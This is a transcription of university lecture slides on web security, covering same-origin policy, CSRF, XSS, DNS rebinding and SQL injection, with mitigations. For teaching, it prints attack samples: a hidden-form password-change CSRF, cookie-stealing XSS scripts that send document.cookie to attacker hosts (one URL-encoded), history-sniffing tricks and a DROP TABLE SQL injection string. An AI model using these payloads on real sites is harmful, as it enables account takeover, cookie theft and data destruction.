Web Security. Aggelos Kiayias Justin Neumann

Similar documents
WEB SECURITY: XSS & CSRF

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

MEMORY-(UN)SAFETY. Dr. Benjamin Livshits

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Web basics: HTTP cookies

Common Websites Security Issues. Ziv Perry

More attacks on clients: Click-jacking/UI redressing, CSRF

CIS 4360 Secure Computer Systems XSS

CSC 482/582: Computer Security. Cross-Site Security

Information Security CS 526 Topic 11

Information Security CS 526 Topic 8

Application vulnerabilities and defences

Security. CSC309 TA: Sukwon Oh

P2_L12 Web Security Page 1

Web Security IV: Cross-Site Attacks

Web Security II. Slides from M. Hicks, University of Maryland

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:

Web Application Security. Philippe Bogaerts

CS 161 Computer Security

WHY CSRF WORKS. Implicit authentication by Web browsers

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Preparing for the Cross Site Request Forgery Defense

Chrome Extension Security Architecture

Web Security: Vulnerabilities & Attacks

Computer Security CS 426 Lecture 41

last time: command injection

Some Facts Web 2.0/Ajax Security

Penetration Test Report

Security for the Web. Thanks to Dave Levin for some slides

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Web Security: Web Application Security [continued]

Security for the Web. Thanks to Dave Levin for some slides

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

RKN 2015 Application Layer Short Summary

Lecture Notes on Safety and Information Flow on the Web: II

Solutions Business Manager Web Application Security Assessment

Multi-Post XSRF Web App Exploitation, total pwnage


WebGoat Lab session overview

Robust Defenses for Cross-Site Request Forgery

Secure Coding and Code Review. Berlin : 2012

Advanced Web Technology 10) XSS, CSRF and SQL Injection

CS 161 Computer Security

s642 web security computer security adam everspaugh

Overview. "Foundations of Security: What Every Programmer Needs To Know Neil Daswani, Christoph Kern, and Anita Kesavan

COMP9321 Web Application Engineering

Client Side Injection on Web Applications

7.2.4 on Media content; on XSS) sws2 1

Match the attack to its description:

Your Scripts in My Page: What Could Possibly Go Wrong? Sebastian Lekies / Ben Stock Martin Johns

The three faces. DeepSec Martin Johns University of Hamburg Universität Hamburg

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

John Coggeshall Copyright 2006, Zend Technologies Inc.

CSCD 303 Essential Computer Security Fall 2018

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

LECT 8 WEB SECURITY BROWSER SECURITY. Repetition Lect 7. WEB Security

CNIT 129S: Securing Web Applications. Ch 3: Web Application Technologies

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno

Integrity attacks (from data to code): Cross-site Scripting - XSS

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Web Security: Web Application Security [continued]

Hacking Intranet Websites from the Outside

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Attacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.

EasyCrypt passes an independent security audit

Web Security, Part 2

Web Security: Vulnerabilities & Attacks

Cross-domain leakiness Divulging sensitive information & attacking SSL sessions Chris Evans - Google Billy Rios - Microsoft

Lecture Overview. IN5290 Ethical Hacking. Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Running Remote Code is Risky. Why Study Browser Security. Browser Sandbox. Threat Models. Security User Interface.

CS Paul Krzyzanowski

Computer Security. 14. Web Security. Paul Krzyzanowski. Rutgers University. Spring 2018

CSCD 303 Essential Computer Security Fall 2017

A Server- and Browser-Transparent CSRF Defense for Web 2.0 Applications

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild

CS 161 Computer Security

CS390S, Week 11:Web Application Security Issues

PHP Security. Kevin Schroeder Zend Technologies. Copyright 2007, Zend Technologies Inc.

Robust Defenses for Cross-Site Request Forgery Review

Eradicating DNS Rebinding with the Extended Same-Origin Policy

Founded the web application security lab

Browser code isolation

Web Application with AJAX. Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar. University of Colorado, Colorado Springs

Content Security Policy

Structure of HTTP GET request

Introduction to Ethical Hacking

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

COMP9321 Web Application Engineering

Transcription:

Web Security Aggelos Kiayias Justin Neumann

Dynamic HTML Umbrella term : HTML Javascript Cascading Style Sheets (CSS) Document Object Model (DOM) : a hierarchical structure API for accessing / manipulating the elements of a web-page.

DOM example <TABLE> <TBODY> <TR> <TD>Shady Grove</TD> <TD>Aeolian</TD> </TR> <TR> <TD>Over the River, Charlie</TD> <TD>Dorian</TD> </TR> </TBODY> </TABLE> example from http://www.w3.org

Cross Domain Problems The web-browser : single program doing a lot of things. a web-browser session involves connections to many different web-sites (some possibly adversarial)

Same Origin Policy protocol://host:port Only objects of the same origin as the data should have access to the data e.g. a script can access things (such as cookies or DOM Objects) of the same origin object

Going Cross Domain Cross Site Script Inclusion (XSSI) Including a resource cross-domain : e.g., visit hacker.com that contains a script : <script src= url of script of other domain ></script> So a script from another site can be included in a present web-site.

Dynamic Script Insertion Site www.site.com has a script that contains function do_work(userdata) { alert("private: " + userdata.private); } This function may be called statically by the script but this is not as versatile. Instead the script can dynamically insert another script that will call do_work with the proper data. do_work({private: 'user private data here'}); http://www.ibm.com/developerworks/library/wa-aj-jsonp1/

XSSI A script from www.site.com may contain a function do_work(userdata). The value of userdata may not be directly available but can be dynamically set by the server with JSON and have the function do_work executed. A malicious script may redefine do_work and use the same mechanism to steal userdata

Cross Site Request Forgery Setup. Alice is logged on mywwwservice.com which has a page update_profile with a password update form (that does not require any additional authentication beyond cookies) evilform 1. Alice s browser loads page from hackerhome.org 2. Evil Script runs causing evilform to be submitted with a password-change request to our good form: www.mywwwservice.com/update_profile with a <input type="password" id="password"> field <form method="post" name="evilform" target="hiddenframe" action="https://www.mywwwservice.com/update_profile"> <input type="hidden" id="password" value="evilhax0r"> </form> <iframe name="hiddenframe" style="display: none"> </iframe> <script>document.evilform.submit();</script> 3. Browser sends authentication cookies to our app. We re hoodwinked into thinking the request is from Alice. Her password is changed to evilhax0r! example from http://gcu.googlecode.com/files/10.ppt

... aka Session Riding It is required that : A live cookie for the targeted web-site is present. The attacker targets a specific form in the targeted web-site with all the correct values entered (as if the user was entering them)

XSRF Mitigations The targeted web-site can check the HTTP referrer data and see that the attacker s site submits the form. The form can require some unpredictable data like the previous password. The form can require a CAPTCHA to require the client to prove that it is not automated.

Another Example XSRF Alice /login.html bank.com /auth uname=victim&pass=fmd9032 Cookie: sessionid=40a4c04de /viewbalance Cookie: sessionid=40a4c04de example from http://gcu.googlecode.com/files/10.ppt

... the attack Alice bank.com evil.org /login.html /auth uname=victim&pass=fmd9032 Cookie: sessionid=40a4c04de /evil.html <img src="http://bank.com/paybill? addr=123 evil st & amt=$10000"> /paybill?addr=123 evil st, amt=$10000 Cookie: sessionid=40a4c04de example from http://gcu.googlecode.com/files/10.ppt

Cross Site Scripting (XSS) (naive) web server e.g., consider a forum web-site 2 1 page user (persistent) malicious script

Cross Site Scripting (XSS) (naive) web server 3 page user 1 e.g., consider searching the naive webserver s database (through the attacker s site) 2 bad link malicious script (non persistent)

Stealing Cookies A malicious script running in the wrong domain (XSS) can send all the domain s cookies. example code to use : <script> new Image().src = http://attacker.com/log.cgi? c= +encodeuri(document.cookie);</script> This function encodes special characters, except:, /? : @ & = + $ # to see this type : javascript:alert(document.cookie)

Example non-persistent XSS Consider a web-site that operates like this : http://portal.example.com/index.php?username=joe Hello Joe The attacker gets you to click on this link: http://portal.example.com/index.php?username=<script>document.location='http:// attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</script> Or URL encoded: http://portal.example/index.php?sessionid=12312312& username=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65 %6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70 %3A%2F%2F%61%74%74%61%63%6B%65%72%68%6F%73%74%2E%65 %78%61%6D%70%6C%65%2F%63%67%69%2D%62%69%6E%2F%63%6F %6F%6B%69%65%73%74%65%61%6C%2E%63%67%69%3F%27%2B%64 %6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3C%2F%73 %63%72%69%70%74%3E

Is your history private? CSS: <style>a#visited { background: url(eviltracker.php?s=example.com); }</style><a href="http://example.com/"> nothing to see here </a> Modifying the way the visited links are colored allows a web-site to understand whether something is in your history. <script>start = new Date();</script> <img src="http://example.com/logo.gif" onload="end = new Date(); if (end.gettime() start.gettime() < 5) { location.href(eviltracker.php?s=example.com); }"> Browser leaks the information to the hosting web-site whether a certain image is in cache through timing.

DNS Rebinding Attacker registers a domain name : attacker.com Attract traffic. Runs a DNS server and a web-server. DNS resolves attacker.com to the web-server but with a very short TTL. When a client asks for DNS resolution again, resolve attacker.com to another IP address. Jackson et al. Protecting browsers from DNS rebinding attacks, ACM-CCS 2007

Attacking SOP through DNS Rebinding Through DNS rebinding an attacker.com script can open sockets from the victim to a chosen target IP. The attacker can exploit the trust a target IP may have to the victim s IP.

Circumventing Firewalls Spidering the intranet Compromising unpatched machines Abusing internally open services

Pinning Protection Browser will pin an IP address to a DNS and will prevent changing. May block some legitimate use (Dynamic DNS : (useful for presenting a persistent domain name for a service that constantly changes location). Jackson et al. Protecting browsers from DNS rebinding attacks, ACM-CCS 2007

Multi-Pinning Separate client side technologies maintain different pinning databases. e.g., JVM maintains DNS pinnings separately from the browser. JVM code can be pinned to the target s IP. e.g., Liveconnect may allow a malicious javascript to use Java runtime libraries with origin a target IP

Ephemeral Botnets A botnet living inside the victims browsers. Can be started by visiting a malicious site. Continues to run until the browser moves on. Transparent to the user / no user interaction. Cross-platform (due to javascript etc.) leaves no trails.

Flash Player Flash player 9 allows socket connections to arbitrary ports as long as the policy of the flash animation allows it. [guess who provides the policy]

Example Jackson et al. Protecting browsers from DNS rebinding attacks, ACM-CCS 2007 Ad-driven using Flash: Attack requires only user view the ad. $10 / day approx 20,000 impressions / day. successful 60.1%. for less than $100 you can have temporarily 100,000 PCs!

SQL Injection Attacks Using unsanitized inputs when accessing databases.

Example : SQL Injection (1) statement = "SELECT * FROM users WHERE name = '" + username + "';" Expected input : Result : aggelos Attackers input : SELECT * FROM users WHERE name = 'a' OR 't'='t'; a' or 't'='t

Example : SQL Injection (2) statement = "SELECT * FROM users WHERE name = '" + username + "';" Expected input : aggelos Attackers input : a';drop TABLE users; SELECT * FROM userinfo WHERE 't' = 't SELECT * FROM users WHERE name = 'a';drop TABLE users; SELECT * FROM userinfo WHERE 't' = 't';

SQL Injection License Plate

Protections Input sanitization whitelisting better than blacklisting be careful of recursive attacks (e.g., if you strip anything of the form <script> then the attacker can give <scr<script>ipt>) PHP IDS and other protection software exists.

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback